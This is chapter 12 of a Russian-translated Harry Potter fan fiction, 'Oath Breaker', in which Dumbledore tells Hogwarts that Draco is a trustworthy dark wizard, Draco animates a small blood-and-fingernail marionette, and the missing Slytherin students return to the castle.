Клятвопреступник (Oath Breaker)

Автор: Goblin Cat KC

Перевод: Weis

Бета: atenas

Оригинал: здесь (разрешение автора на перевод получено)

Рейтинг: R (авторский; PG-15 – переводчика)

Пейринг: Драко Малфой/Гарри Поттер, Люциус Малфой/Северус Снейп

Жанр: драма/приключения

Статус: закончен

Краткое содержание: Малфои предпринимают драматичную эскападу, Драко приходится обучать Гарри темной магии, а все студенты Слизерина исчезают.

Глава 12

Драко проспал целый день, и ему снились не обычные кошмары, а полеты в сумерках на метле, созданной древней магией. Луна только начала свой путь над верхушками деревьев, и он лихо кружил среди облаков под появляющимися звездами. Ветер гнал его все выше и выше, пока земля внизу не начала казаться лоскутным одеялом, усеянным островками домов. Драко откуда-то знал, что сейчас нет нужды прятаться от магглов или светлых магов, как знал и то, что позади летят несколько человек, вместе с ним пересекающих страну.

Он лениво направил метлу вниз и снова взмыл вверх, просто чтобы почувствовать, как ночной воздух обдувает тело.

- Ты был прав, - произнес кто-то рядом с ним. – После заката здесь еще красивее.

- Конечно. Только ночью видно звезды, - отозвался Драко. Он хотел было посмотреть, кто его собеседник, но смог лишь самую малость повернуть голову и увидел только краешек рукоятки «Молнии». И чем больше юноша старался разглядеть его, тем дальше оказывался незнакомец, пока не стал похож на золотую птицу далеко впереди. Протянув руку, Драко осторожно схватил ее и поднес к груди.

- Наконец-то я тебя поймал, - прошептал он и проснулся.

Поморгав, прогоняя сон, он встретился взглядом с Мастером зелий.

- Сегодня никаких кошмаров?

Неужели он проспал весь день? Драко казалось, что он закрыл глаза буквально несколько минут назад.

- Никаких. Мне приснилось, что я летал… и, кажется, там был кто-то еще, - застонав, он помотал головой, пытаясь окончательно прийти в себя.

- Ясно. Можешь пошевелить рукой?

Поглядев на правую руку, Драко поморщился и попробовал сжать кулак. Пальцы сомкнулись неплотно, и в хватке не было никакой силы. В костях появилась тупая ноющая боль, которая с каждым движением становилась сильнее.

- Больно, - сказал юноша.

- Хорошо, - кивнул Северус. – Значит, заживает. Сядь и выпей лекарство, - он вручил крестнику пузырек, и тот послушно осушил его, мимоходом отметив вкус вереска, вербены и каких-то поганок. Еще одна исцеляющая микстура.

- Как твоя спина?

Драко пошевелил плечами и слегка потянулся.

- В порядке. Шрам будет?

- Ты совсем как отец, - вздохнул Северус, собирая свои склянки. – Тот тоже, еле выжив в сумасшедшей передряге, мог думать только о том, как бы у него не осталось шрама.

- В какой передряге? – полюбопытствовал Драко. 

- Которая случилась, когда мы были студентами, - уклончиво ответил Мастер зелий. – Итак, насколько я понимаю, ты сообщил директору, что намереваешься остаться?

- Да, - медленно подтвердил юноша. Понять, что об этом думает Северус, было невозможно. – Я был неправ?

- Я не умею предсказывать будущее. Время покажет, было ли твое решение благоразумным или оно будет стоить детских жизней… - увидев, как встревожился Драко, Мастер зелий договорил: – Но в настоящий момент этот вариант кажется наилучшим. В конце концов, если потребуется, вы можете покинуть замок в любой момент.

Его слова не слишком успокоили Драко, но он воздержался от комментариев, вместо этого поинтересовавшись, который час.

- Скоро ужин, - ответил Мастер зелий. – У тебя достаточно времени, чтобы принять душ и приготовиться.

- Это безумие, - пробормотал юноша.

- Согласен, - кивнул Северус, поднимаясь. – Ни один темный маг никогда не признавался так открыто, кто он такой. И все же… сейчас все меняется, хотя, кажется, никто этого не замечает. Если тебе удастся… - он направился к двери, не договорив, но на полпути обернулся: - Ладно, поторапливайся. И разбуди Поттера. Если его не будет с тобой, все решат, что мы принесли его в жертву.

- Хорошо.

Драко проводил крестного взглядом и посмотрел на тумбочку. Там около свечки лежали его с Гарри палочки. Обрадовавшись, юноша выбрался из постели, помассировал больную руку и опустился на колени возле сундука в изножье кровати. Выбрав одежду, он взял палочки и подошел к Гарри.

- Вставай, Поттер, - он потряс гриффиндорца за плечо.

- Чего?..– невнятно пробормотал тот и перевернулся на другой бок.

- Вставай, я сказал, - Драко потряс его сильнее. – А то опоздаем.

Ужасно недовольный и растрепанный сильнее обычного, Гарри сел и мрачно уставился на слизеринца, но его взгляд нисколько не смутил Малфоя.

- Как мы можем опоздать, если я только-только лег?

- Ты проспал несколько часов, - возразил Драко. – Давай, подъем.

Он подождал, пока Гарри выберется из постели, и только тут понял, что гриффиндорцу не во что переодеться. Придется быстренько зачаровать его одежду, почистив и освежив ее, пока Поттер будет в душе.

- Кто-нибудь приходил, пока я спал? - поинтересовался тот, следуя за Драко в душевую.

- Это не лазарет, - ответил юноша. – Даже если друзья и хотели тебя навестить, сомневаюсь, что Северус впустил бы их.

Он вошел в ближайшую кабинку, повесил одежду на крючки для полотенец и разделся. Несколько раз прошептав слова ритуала, слизеринец вдруг почувствовал, как его ступни омыла прохладная вода, и посмотрел вниз. К его удивлению, Гарри снова выбрал соседнюю кабинку и, похоже, он предпочитал не такую горячую воду, как Драко.

Юноша помедлил, уставившись на тонкую металлическую перегородку между ним и Гарри. Прижав к ней ладонь, он закрыл глаза, чувствуя, как вода бьет в стенку, и слушая, как изменяется звук, когда гриффиндорец двигается. Наклонившись вперед, он коснулся лбом  перегородки, и замер. Он чувствовал себя спокойнее, зная, что Гарри рядом.

Поймав себя на этой мысли, Драко вздрогнул и отшатнулся, прижав ладонь ко рту. Он не ожидал, что его игрушечный амулет начнет действовать так быстро или повлияет на его собственные эмоции. Слегка успокоившись, юноша сказал себе, что, по крайней мере, чары работают. Быстро закончив мыться, он оделся и вышел, порадовавшись, что успел раньше Гарри. Направив палочку на одежду гриффиндорца, кучкой лежащую на полу, он пробормотал очищающее, а потом и разглаживающее заклинания. И положил сверху его палочку.

- Я подожду тебя в гостиной, - сказал он и вышел.

- Я скоро, - отозвался тот.

В гостиной, на одном из столиков рядом с диваном, стояло блюдо с яблоками. Драко взял одно и сел, но через несколько секунд вскочил и принялся расхаживать по комнате. Доев, он бросил огрызок в камин и опять сел. Побарабанил пальцами по диванной подушке, поднялся и снова зашагал туда-сюда.

Он никак не мог справиться с круговертью собственных мыслей. Сегодня ночью его слизеринцы вернутся домой, но прежде ему придется предстать перед всей школой. А вдруг кто-то проклянет его раньше, чем Дамблдор скажет свою речь? Или решит отомстить за то, что он сделал с их друзьями? Вдруг Пожиратели решат напасть на замок?  Тяжело вздохнув, юноша уставился на озеро через стеклянную стену.

- А вдруг яблоки отравлены? - посмеялся он над собой. Ни собственное беспокойство, ни воспоминания предков не помогут ему сейчас. Закрыв глаза, он прислонился к холодному стеклу и велел себе не думать о предстоящем ужине.

Когда он снова посмотрел в окно, оттуда на него таращился огромный глаз кальмара. Вскрикнув от неожиданности, Драко стремительно отшатнулся, ударившись бедром о край стола. Зашипев от боли, он увидел, что кальмар застыл перед стеклом, растопырив щупальца. С такого близкого расстояния было видно, насколько уродливо чудовище. Драко задумался – все ли в порядке с кальмаром? Прежде тот никогда не заглядывал в окно. Обычно он просто проплывал мимо, никого не замечая.

- Он даже больше, чем я думал, - прошептал Гарри, стоя в дверях.

Драко быстро оглянулся на него, но ничего не сказал. Кальмар пробежался щупальцами по краю стекла, словно ища зазор, и слегка повернулся, так, что мальчикам стал виден его острый клюв. Подняв палочку, Драко наколдовал такой яркий «люмос», что кальмар мгновенно отпрянул и скрылся в мутной воде. На стекле остались разводы от щупалец, но через несколько секунд вода их смыла.

- Зачем ты это сделал? – требовательно спросил Гарри, подходя ближе. – Он же не делал ничего плохого.

- Он… - Драко посмотрел туда, куда уплыл кальмар, и понадеялся, что монстр не вернется. – Он не должен…

Гарри подошел ближе, пытаясь заглянуть ему в лицо.

- Малфой, ты что, испугался?

Почувствовав, что краснеет, Драко поспешно отошел к камину, надеясь, что его румянец можно будет списать на жар от огня. К его неудовольствию, Гарри последовал за ним, но слизеринца спасло появление Северуса.

- Хорошо, что вы готовы, - произнес Мастер зелий. – Идемте.

Никогда еще путь к Большому залу не казался таким длинным. Обычно в это время в коридорах можно было встретить запоздавших студентов, или тех, кто решил пропустить ужин и направлялся в библиотеку. Сейчас же собственные шаги казались Драко слишком громкими, а школа – слишком пустой.

- Будь настороже, – пока они шли, велел ему крестный. – И ты тоже, – он с отвращением взглянул на Гарри, словно его оскорбляла сама необходимость говорить с гриффиндорцем. – Хотя их внимание и сосредоточено на нас, тобой они тоже не очень довольны.

Проигнорировав тон Снейпа, Гарри посмотрел на Драко. Тот шел, опустив голову.

- Гриффиндорцы не станут нападать на тебя. Ты можешь сесть с нами, если…

- Нет, - торопливо перебил Драко, опасаясь поддаться искушению и устроиться рядом с тем, кто его защитит. – Не надо, со мной все будет в порядке, - он улыбнулся. – В любом случае, ты будешь прямо напротив.

Гарри, увидев его улыбку, просиял и кивнул.

Приблизившись к дверям зала, Северус остановился, давая мальчикам время собраться с духом. Драко хотел было поднять капюшон и едва не запаниковал, не найдя его, прежде чем вспомнил, что та мантия осталась в гостиной. Северус открыл дверь и вошел. Глубоко вздохнув, Драко поднял голову и последовал за ним.

Все тут же на них уставились. Когда Гарри направился к Уизли и Грейнджер, освободившим для него место, по залу побежали шепотки. Драко последовал за наставником в другой конец зала и уселся во главе слизеринского стола. Северус прошел дальше и сел на свое обычное место, не обращая никакого внимания на других профессоров, украдкой наблюдающих за ним.

Драко сидел напряженно выпрямившись. Одну руку он положил на стол, а другой под столом очень осторожно вынул палочку из кармана. Затаив дыхание и глядя куда-то в пол возле профессорского стола, он ждал, краем глаза держа всех в поле зрения. Что бы ни произошло, первый, кто отважится напасть на него или на Гарри, не успеет даже договорить заклинание.

Поднялся Дамблдор и, подождав, пока смолкнет гул голосов, заговорил:

- Я знаю, что все вы в курсе слухов, касающихся ночного происшествия и отсутствия некоторых ваших товарищей. Слухов о том, что группа студентов совершила покушение на жизнь другого студента. Мне очень неприятно признавать, что эти слухи правдивы.

Тут же зазвучали взволнованные разговоры, но на сей раз Дамблдор не стал ждать, пока они стихнут.

- Прошлой ночью несколько студентов из Равенкло и Хаффлпафа попытались убить Драко Малфоя и Гарри Поттера. Им это почти удалось. Только благодаря своим знаниям и навыкам эти молодые люди остались живы. То, что им пришлось защищать свои жизни – позор для Хогвартса.

- Виновных сейчас нет среди нас не потому, что им назначено такое наказание, а потому, что их настигло возмездие за нарушение священных законов гостеприимства. Можете быть уверены, что любые подобные действия будут иметь столь же печальные последствия, и даже могут закончиться смертью нападающих.

- Я думаю, к настоящему моменту все уже пришли к какому-то заключению относительно того, на чьей стороне мистер Малфой. Тем не менее, я считаю нужным сообщить, что его действия помогли нам вывести из строя половину Пожирателей во время одного из их рейдов и стали причиной смерти многих из них. Все вы слышали о гибели его дома, но мало кто знает, что мистер Малфой с риском для жизни остался уничтожить имение, чтобы оно не досталось Волдеморту, а затем пролетел через всю страну, в буран, стараясь попасть в Хогвартс. Его помощь, с тех пор как он находится здесь, под нашей защитой, стала решающей  в борьбе с Волдемортом.

Драко чуть не засмеялся. В устах Дамблдора это звучало так героически. Он надеялся, что когда-нибудь, когда обо всем этом напишут в учебниках истории, никто не вспомнит, что он был сам не свой от ужаса, стоя перед Волдемортом, и едва не умер, запаниковав и спрятавшись в старых подземельях.

Он не смог сдержать улыбку. Героический Малфой в книгах по истории – это что-то.

Среди общего гомона вдруг ясно послышался детский голосок. Первоклашка, слишком маленькая, чтобы сообразить говорить потише, спросила:

- Но он ведь темный маг, верно?

Вопрос словно повис в воздухе и разговоры снова стихли. Все замерли. Драко проглотил комок в горле и крепче сжал палочку. Зная, что на этот раз Дамблдору не удастся отделаться эвфемизмами, юноша выжидающе подобрался. Даже не глядя на профессорский стол, он знал, что Северус сделал то же самое. Отчего-то ему стало трудно дышать и приходилось прикладывать усилия, чтобы сидеть прямо. Но как бы ему ни хотелось сбежать, Драко знал, что это только усложнит ситуацию.

- Мистер Малфой и в самом деле темный маг, - медленно проговорил Дамблдор.

Все тут же уставились на Драко, словно после такого заявления он должен был превратиться во что-то иное, предстать перед всеми в своем истинном обличии. Увидеть все того же худого юношу, который ни на кого не смотрел, было, в своем роде, разочарованием.

- Я искренне сомневаюсь, что кто-то из вас, встретив темного мага, сумеет понять, кто перед вами, - продолжал Дамблдор. – Темные маги – не монстры, о которых говорится в сказках. Они хорошо умеют скрываться, и на то есть веские причины - покушение на жизнь мистера Малфоя это подтверждает. И все же вот он, перед вами, готовый довериться нам, вопреки действиям ваших товарищей, вопреки тому, что могли бы совершить и вы, если бы были столь же уверены в собственной правоте, как и ваши друзья.

- Значит… он в самом деле на нашей стороне? – раздался от Хаффлпафского стола тот же самый голосок, ясно прозвучав в тишине зала.

- Мистер Малфой потерял свой дом и, вполне вероятно, свою семью, но помог нам в этой войне, - очень серьезно ответил Дамблдор. – И он доказал искренность своих намерений так, что у меня не возникло никаких сомнений. Фактически, он доказал, что достоин доверия, настолько, что вчера мистер Поттер стоял между ним и толпой, жаждущей его смерти.

По залу снова понеслись взволнованные разговоры, но на этот раз их тон был скорее одобрительным. Драко немного расслабился и позволил себе надеяться, что все может закончиться хорошо.

- Впервые за всю нашу историю у нас есть шанс прекратить долгое противостояние между темными и светлыми магами, - продолжал Дамблдор. – Драко Малфой сделал первый шаг, доверившись нам. Гарри Поттер – второй, доказав, что достоин его доверия. Способны ли на такое остальные обитатели Хогвартса?

Стало очень тихо. Едва сдерживая желание оглядеть зал, Драко задумался – зачем старику понадобилось задавать такой дурацкий вопрос? Студенты смотрели друг на друга, не зная, что делать.

- Гриффиндор будет достоин этого доверия, - раздался голос Рона Уизли, и Драко недоуменно моргнул. Взглянув на гриффиндорский стол, он ожидал увидеть недоверие на лицах сидящих там студентов, но ничего подобного не обнаружил.

Почти сразу же прозвучало:

- Хаффлпафф будет достоин этого доверия.

Судя по выражению их лиц, каждому хаффлпафцу хотелось восстановить попранную репутацию факультета. Вместе со всеми остальными Драко ждал, что скажет Равенкло. На лицах равенкловцев ясно читались сомнения. Драко был уверен, что они уже прочли о темных магах все, что смогли найти в библиотеке, обнаружив больше вымыслов, чем правды, да и правдивые истории, он знал, описывали не самые невинные их проделки.

- Равенкло будет достоин доверия, - раздалось, наконец, осторожное обещание, в котором ясно прозвучали невысказанные условия. Но все же это было обещание.

Драко, не заметивший, когда затаил дыхание, с облегчением выдохнул, а быстрый взгляд на преподавательский стол подтвердил, что Северус тоже успокоился.

Дамблдор улыбнулся так, будто с самого начала предвидел подобный исход.

- Должен признаться, что чем старше я становлюсь, тем чаще мои самые смелые надежды воплощаются не взрослыми, а молодежью, бесстрашной в своем идеализме. Возможно, когда этот конфликт будет разрешен, мы обнаружим, что выиграли не одну, а две войны: одну – против Темного лорда, а другую – против себя самих. Но, думаю, уже хватит о войне.

На столах появилась еда, и все присутствующие, включая Драко, заметно расслабились. Слизеринец спрятал палочку в карман мантии. Пусть общее настроение оставалось напряженным, но, по крайней мере, этим вечером никто не будет пытаться его убить. Взглянув на свою тарелку, он понадеялся, что Добби не отравил его еду.

Ужин тянулся страшно медленно, и через некоторое время юноша начал думать, что уж лучше бы еда была отравлена. Все глазели на него, словно на ядовитую змею в зоопарке, которой стучат в стекло, чтобы та шевельнулась. Драко ел, не поднимая глаз и изо всех сил стараясь игнорировать приглушенные разговоры о его пропавших родителях и о попытках министерских чиновников добраться до него. Вместо этого он старался услышать как можно больше новостей о Хогсмиде, уловив краем уха, что закрылась кондитерская, а ее владелец исчез, и что виной продолжительному отсутствию Амелии Боунс вовсе не болезнь, как утверждает министерство. Студенты даже упомянули погибших, над чьими домами был замечен Знак мрака. 

Сопоставив все услышанное с тем, что ему было известно, юноша улыбнулся. Темный лорд принялся за поиски пропавших детей. Он решил, что они где-то затаились, и искал вслепую, по домам предавших его Пожирателей, но, естественно, те дома давно пустовали. Казалось, он даже не догадывался, что дети скрылись в лесу, как дикие зверьки.

Но это очень странно. Как он может не знать таких очевидных вещей? Детей темных магов учат этому едва ли не с рождения. Волдеморт был еще безумнее, чем все думали.

Вскоре студенты поняли, что Драко не собирается устраивать представления, и начали расходиться. Тишина была намного приятнее их пересудов, и когда в зале осталось всего несколько человек, в том числе и Поттер с друзьями, слизеринец совсем успокоился. Он смотрел, как они разговаривают, и увидел, как Гарри кивнул в ответ на что-то, сказанное Грейнджер. Девушка кинула неодобрительный взгляд на Драко и снова посмотрела на Гарри. Вскоре они с Уизли поднялись и ушли, оставив за столом только Поттера. Тот отодвинул тарелку и, посмотрев на Драко, улыбнулся.

Наконец зал покинули немногие оставшиеся студенты и преподаватели. За профессорским столом остались Снейп и Дамблдор, давным-давно закончившие ужинать. Северус что-то писал, а старик играл в подрывного дурака, осторожно пристраивая к карточному домику новые этажи и вслух размышляя, когда же он взорвется.

Драко вздохнул, поднялся, и, незаметно потянувшись, прошел в середину зала, где устроился на углу равенкловского стола. Как он и ожидал, Гарри тут же присоединился к нему.

- Как думаешь, когда они появятся? – спросил гриффиндорец, садясь рядом.

Драко хотелось задать Северусу тот же вопрос, но он знал, что тот лишь посмеется над ним и назовет еще большим глупцом, чем обычно. И в самом деле, от преподавательского стола донеслось едва слышное фырканье.

- Понятия не имею. Они замаскированы очень хорошо, так что мы даже не узнаем, когда они пересекут защитную границу замка. Нам придется ждать, пока они не войдут. Может, они вообще сегодня не появятся.

- И что… нам придется сидеть тут всю ночь?

- Тебя никто не держит, - заметил Северус.

- Но, - встрял Дамблдор, добавляя очередную карту, - это будет жестом, достойным Гриффиндора, если его представитель поприветствует слизеринцев.

Северус мрачно посмотрел на старика, перевел взгляд на Поттера и вернулся к своему занятию.

- Если бы я знал, что придется ждать, - вздохнул Гарри, - попросил бы у Рона шахматы.

Драко искоса взглянул на него.

- У тебя палочка с собой?

- Конечно.

Повернувшись к пустому залу, слизеринец взмахнул своей:

- Fyria raebaena, - с кончика его палочки, извиваясь как змея, сорвалась струя пламени, в которой то и дело вспыхивали желтые и оранжевые огоньки. Драко дернул рукой, оборвав поток. Огненная лента еще мгновение повисела в воздухе, ярко вспыхнула и рассыпалась ворохом искр. Протянув руку, Гарри поймал несколько. Они были невесомыми, словно перышки. Юноша улыбнулся.

- Что это было? Тоже темная магия?

- Это огненная лента, - ответил Драко. – Ничего особенного – просто заклинание. Я выучил его в детстве, пока ждал, когда родители вернутся с… - он замолчал.

- Вернутся откуда? – переспросил Гарри.

- Вернутся домой, - закончил слизеринец, решив не уточнять, что те возвращались с ночных рейдов, во время которых запугивали соседей. – Наши родители, вообще-то. Я, Пэнси, Грегори, Тед, Винсент – мы жили рядом и собирались вместе, когда наши родители отправлялись… в гости.

- Вроде пижамных вечеринок?

- Вроде того.

Драко наколдовал еще одну огненную ленту, на этот раз голубую с зелеными и белыми всполохами. Она спиралью устремилась к потолку и исчезла в облаке дыма. Гарри поднял палочку, тоже приготовившись колдовать.

- Не слишком сильно, - напомнил ему слизеринец.

Тот глубоко вздохнул и сосредоточился.

- Fyria raebaena, - из его палочки вырвался гигантский язык пламени, пронизанный яростными разрядами молний. Гарри ахнул и отшатнулся. Пламя угрожающе полыхнуло, и во все стороны побежали темные всполохи.

- Tampestas! – поспешил выкрикнуть Драко. Белый свет окружил заклинание Гарри, и спустя мгновение оно взорвалось безопасным облаком снега. Слизеринец ошеломленно уставился на Гарри. – Какого черта ты вытворяешь?

- Что? Я просто… я ничего такого… я просто повторил за тобой! – принялся оправдываться тот. – Ты сказал, это просто заклинание!

- Раньше ничего такого не было!

- Может, лучше не запускать фейерверки в помещении? - произнес Дамблдор. От всплеска энергии его карты взорвались, подпалив ему бороду.

- Простите, сэр, - пробормотали юноши. Драко с подозрением посмотрел на Гарри, но решил не придираться.

- Ручаюсь, вы можете найти для развлечения что-нибудь менее взрывоопасное, - ухмыльнулся Северус.

Драко задумчиво нахмурился, но ничего подходящего в голову не приходило. Все известные ему простенькие заклинания годились лишь для скромных световых фокусов. Наверное, магия Малфоев действительно была несколько показушной.

- Вообще-то, - заметил Дамблдлор, убирая со стола пепел, - в темной магии есть кое-что, о чем я слышал, но никогда не видел. Но с тех пор, как я об этом узнал, мне ужасно хотелось на это посмотреть.

Снейп взглянул на него заинтересованно и настороженно.

- И что же это?

- Оживление неживых объектов, обычно кукол. Не проклятые куклы, как на Дрянн-аллее, а…

- Марионетки, - перебил его Мастер зелий едва слышно. – Мы называем их марионетками, не куклами.

- Но поскольку это запрещенная магия, - продолжал Дамблдор, - я никогда не видел ничего подобного.

Северус и Драко переглянулись. Объявив всей школе, кто такие Малфои, глупо было отказываться от маленькой демонстрации, но создать марионетку и заставить ее плясать по прихоти Дамблдора - это шло вразрез со всеми их инстинктами самосохранения.

- Если я прошу слишком многого, то я, конечно, пойму… - начал было старик.

- Нет, - перебил его Драко. – Все нормально. Я… я покажу.

По выражению лица Мастера зелий было понятно, что он об этом думает, но он промолчал. В конце концов, Малфои невероятно самодовольные создания.

- Тебе понадобится ткань, - он наколдовал тряпку и, взмахнув палочкой, отправил ее к Драко. Поймав, юноша повертел потрепанный лоскут в руках и по знакомому зеленому рисунку определил, что это тряпка из кладовой Северуса. Обычно он предпочитал новую, неиспользованную ткань, но такая тряпка была даже лучше, ведь она по природе своей должна оставаться чистой ото всех ингредиентов, чтобы они случайно не смешались и не вступили в какую-нибудь реакцию.

Ему уже несколько лет не приходилось создавать марионеток, но он хорошо помнил, как это делается. Оторвав несколько полосок, юноша положил их на колени и свернул тряпочку так, чтобы придать ей форму фигурки с ручками и ножками, связав в нужных местах оторванные полоски и сделав узел вместо головы. Когда он закончил, у него в руках оказалась тряпичная кукла, достаточно большая, чтобы было удобно держать ее в руке.

Не дожидаясь просьбы Драко, Северус бросил ему маленький перочиный нож. Поморщившись, юноша взял его, сделал небольшой надрез на левой руке – ему надоело калечить правую – и позволил нескольким каплям крови впитаться в грудь марионетки. От крови зеленая ткань потемнела.

Затем слизеринец повернулся к Гарри.

- Дай-ка мне взглянуть на твои пальцы.

- Чего? – тот опасливо отдернул руки.

- Я не сделаю тебе ничего плохого, просто посмотрю, - он схватил ладонь Гарри и притянул ее к себе. Как он и подозревал, ногти у гриффиндорца были неровными и обгрызенными. Учитывая, что Поттера пытался прикончить Темный лорд, подобная привычка была вполне объяснима.

- Сиди смирно, - велел ему Драко, отрезая небольшие кусочки ногтей и засовывая их в тряпичное тельце марионетки.

- Она ничего мне не сделает? – спросил Гарри.

- Абсолютно ничего, - Драко спрыгнул со стола и, поднявшись на возвышение перед профессорским, остановился напротив Дамблдора. Поднеся куклу к губам, он дунул на нее, положил перед стариком и три раза коснулся палочкой ее головы.

Несколько мгновений ничего не  происходило. Потом медленно, словно листья на ветру, ручки куколки начали шевелиться. Она перевернулась на бок и, пошатываясь, встала на ноги. Двигаясь, словно марионетка на запутавшихся веревочках, ломаными, неровными шажками она направилась к старику. Тот наклонился, чтобы рассмотреть ее получше.

- Не дайте ей коснуться вас, - предупредил его Снейп. – Были использованы ногти, значит трогать ее теперь, когда она двигается, опасно.

- Потрясающе, - прошептал Дамблдор. – Я читал об этом, но никогда не видел некромантии шаг за шагом. И все это только кровь, дыхание и ногти.

- Для безопасных марионеток лучше использовать траву, - заметил Мастер зелий. – Эта может вытянуть из вас всю жизненную силу, если подойдет достаточно близко.

- Ты рассказывал об этом, - вспомнил Гарри, – когда мы говорили о Дрянн-аллее и старухе, что продает ногти.

- Продает ногти? – переспросил старик. - Ах, да, в самом деле, когда я наведывался туда, то встречал таких торговцев. Но зачем продавать, если они растут сами?

- Потому что я не смог бы использовать свои ногти, если уже пустил в ход свою кровь, - объяснил Драко. – Нужны чьи-то еще. Я удивлен, что вы не знаете об этом, сэр.

- Не нужно недооценивать усилия, которые вы приложили, чтобы скрыть свою  культуру, - отозвался Дамблдор, явно очарованный марионеткой. – Несмотря на все мои поиски я так и не нашел ни одной книги по темной магии, подобной нашим учебникам или вашей семейной летописи. Жизнь, полная опасностей, приучила темных магов передавать знания из уст в уста, не доверяя бумаге, - он взял обгоревшую карту и осторожно потыкал в куколку, не давая ей подойти ближе. – Как от них избавляются?

- Там всего несколько капель крови, - ответил юноша. – Она скоро выдохнется.

- А можно сделать так, чтобы они жили подольше? – полюбопытствовал Гарри.

Немного поколебавшись, Драко ответил:

- Можно, но нужно больше крови.

- Насколько больше? – нахмурившись, спросил гриффиндорец. – Об этом говорил Рон? Нужно принести в жертву человека?

- Любая пролитая кровь – жертвоприношение, - пробормотал Драко. – Но я никогда не слышал о марионетке, для которой понадобилось бы отнять жизнь. По крайней мере, не в последнее время. Они слишком опасны. Даже таких маленьких мы делаем не слишком часто.

- Зачем они вообще вам нужны? – Гарри посмотрел на куколку, которая остановилась и, безжизненная, упала на стол. Было ясно, что отведенный ей срок истек. – Даже маленькие, зачем?

- Если бы ты мог послать несколько таких малюток в дом Пожирателя, разве ты стал бы колебаться? – спросил Драко.

Гарри смотрел, как Дамблдор поднял куколку и принялся вертеть ее в руках, явно размышляя, как нечто подобное можно использовать в качестве оружия.

- Это неправильно, - прошептал гриффиндорец. – Это вроде маленького бездушного убийцы.

- Именно, - согласился старик. – Маленькое чудовище, которое может убить Пожирателя, чтобы аврору не пришлось рисковать жизнью… по крайней мере, пока ему не придется уничтожать эту вещь.

- Поттер, - резко произнес Драко. – Неужели ты думаешь, что Темный лорд не использовал бы их против вас, если бы знал, как они делаются?

Гарри нахмурился и промолчал, но было ясно, что слова Драко его не убедили.

Драко снова задумался - почему Темный лорд не догадался, что дети темных магов спрячутся от него в лесу? Теперь, когда стало очевидно: Волдеморту ничего не известно о том, что имеется в арсенале любого темного мага - он решил рискнуть и задать крестному вопрос, в ответ на который, скорее всего, не услышит ничего вразумительного, только резкие замечания.

- Северус, я тут кое о чем подумал. Темный лорд до сих пор не понял, как найти Пэнси, и он не использует большую часть магии, о которой мы знаем, ограничиваясь непростительными проклятьями. Ты знаешь, почему?

Снейп и Дамблдор многозначительно переглянулись. Слишком многозначительно. Вот почему Драко терпеть не мог легилиментов – они совершенно спокойно могли говорить о тебе прямо перед твоим носом. Что еще хуже, Гарри тоже выглядел настороженным. Драко нахмурился. Что такого они знают, что неизвестно ему?

- Да, этому есть объяснение, - медленно произнес Дамблдор. – Немногим известно об истинном происхождении Волдеморта. Достаточно сказать, что он рано потерял семью, и у него не было возможности узнать о своем наследии.

- Потерял семью? – повторил Драко. – Но… даже если его не усыновили, сны должны были рассказать ему, что и как. Даже если он не знал, кто он, кошмары научили бы его всему.

- Жизнь Волдеморта была полна странных событий, - пожал плечами Дамблдор. – В том окружении, в котором он рос, практически невозможно было поверить в существование магии. Его мать умерла во время родов, и он воспитывался в маггловском приюте.

- Он вырос с магглами? – неверяще переспросил Драко. – Как… - он хотел было сказать «как Поттер», но один взгляд на Гарри, лицо которого исказилось в болезненной гримасе, заставил его замолчать. Но тут в голову Драко пришла еще более пугающая мысль.

- Подождите-ка… - медленно произнес он. – Если он темный маг и ничего не знает о своей семье, значит, за все годы использования темной магии он ни разу не применил очищающий ритуал?

Северус кивнул.

- Неудивительно, что он безумен, - прошептал юноша. – Как он вообще выжил?

- Благодаря своей магической силе, я полагаю, - ответил Дамблдор. – Вообще-то я не имею ни малейшего представления, что случится, когда он умрет. Вся накопленная им магия может пропасть без следа, а может полностью поглотить его, когда исчезнет сдерживающая ее сила.

Драко подумал, что было бы замечательно, если бы она поглотила его прямо сейчас, избавив их всех от лишних хлопот. Вернувшись за равенкловский стол, он погрузился в размышления.

Было очевидно, что они о чем-то умалчивают. Эти трое знали что-то важное, что-то, что они никому больше не могли рассказать. Уж точно не министерству. Это наверняка касается настоящего имени Темного лорда – не мог же он появиться на свет похожим на труп. Нет, кто-то, или даже он сам, создал этот жуткий образ.

Северус кашлянул, привлекая внимание Драко.

- Я расскажу тебе, - пообещал он. – Не сейчас, но расскажу. Боюсь, тебе это не понравится, а я бы хотел какое-то время  обойтись без твоих истерик.

Юноша прищурился, но удержался от едкого комментария, не желая устраивать сцену при свидетелях. Мастер волен оскорблять ученика, когда ему вздумается, а тот, по крайней мере, когда вокруг другие, обязан выказывать должное уважение. Это одна из привилегий мастера. И все же… Драко вздохнул и надулся. Нечестно.

- Лучше расскажи ему поскорее, - посоветовал Дамблдор Мастеру зелий. – Он уже многое понял. После всего, что он сделал, нам не следует… - внезапно он осекся и удивленно замер. – Надо же… потрясающе. Я думал, что замечу проникновение, но не почувствовал ровным счетом ничего.

Сначала никто не понял, о чем говорит старик, и почему он выжидающе уставился на дальнюю дверь зала, но потом Драко услышал звук шагов нескольких дюжин людей, поднимающихся по лестнице, и возбужденные детские голоса, перемежающиеся усталыми, более взрослыми. Сначала они были едва слышны, но постепенно становились все громче и громче, пока, наконец, Драко не смог больше сдерживаться. Совершенно не заботясь о том, что подумают остальные, он вскочил и кинулся к дверям. Он не добежал каких-то несколько футов, когда они распахнулись и появилась Пэнси, а сразу за ней -  Крэбб и Гойл.

Полы их мантий обтрепались – результат долгого пути среди колючих кустов и подлеска. И хотя сама одежда была чистой, от нее пахло не водой и мылом, а очистительными заклятиями. Все были бледными, и почти все похудели. Пожалуй, только Винсенту это пошло на пользу, остальные выглядели попросту больными.

Драко быстро оглядел их, просто чтобы убедиться, что все здесь. Блейз, Теодор, Грегори, Дафна, Пэнси… Быстро приблизившись, он порывисто обнял ее, и она так же крепко обняла его в ответ. Прикосновение ее маленьких ручек и звук ее голоса сделали их появление более реальным, меньше похожим на сон. Они, конечно, будут безбожно дразнить его за это много недель, но Драко не мог сдержать улыбки, когда друзья окружили его и каждый старался похлопать его по плечу.

- Драко! Наконец-то…

- …ты никогда не поверишь, что произошло…

- …нам пришлось убить трех Пожирателей…

- …и это хорошо, потому что их кровь помогала нам прятаться все эти месяцы…

- …одна из них была миссис Пеллинор, помнишь ее? Кузина Грега, с такими странными волосами…

- …нескольких малышей настигло задыхательное проклятье…

Драко не мог уследить, кто что говорит, но он и не пытался. Важно было лишь то, что они вернулись. Их голоса на некоторое время прогнали его тревоги. Завтра он объяснит, что происходит и какова расстановка сил, но сейчас его слизеринцы были там, где и должны быть – рядом с ним.

